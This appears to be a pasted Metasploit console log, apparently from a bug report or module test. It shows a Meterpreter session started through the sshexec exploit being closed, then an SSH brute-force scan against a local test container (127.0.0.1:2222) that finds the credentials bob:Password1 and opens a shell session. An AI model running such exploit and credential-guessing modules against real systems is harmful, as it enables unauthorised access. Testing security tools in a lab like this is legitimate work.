[*] Command Stager progress - 100.00% done (800/800 bytes)

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 127.0.0.1 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(multi/ssh/sshexec) > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set SSH_DEBUG false
SSH_DEBUG => false
msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 127.0.0.1:2222 - Starting bruteforce
[+] 127.0.0.1:2222 - Success: 'bob:Password1' 'uid=700(bob) gid=700(bob) groups=700(bob),700(bob) Linux e6dc4f387859 5.10.60.1-microsoft-standard-WSL2 #1 SMP Wed Aug 25 23:20:18 UTC 2021 x86_64 Linux '
[!] No active DB -- Credential data will not be saved!
[*] SSH session 2 opened (?? -> ?? ) at 2022-03-24 22:49:17 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

```
</p>
</details>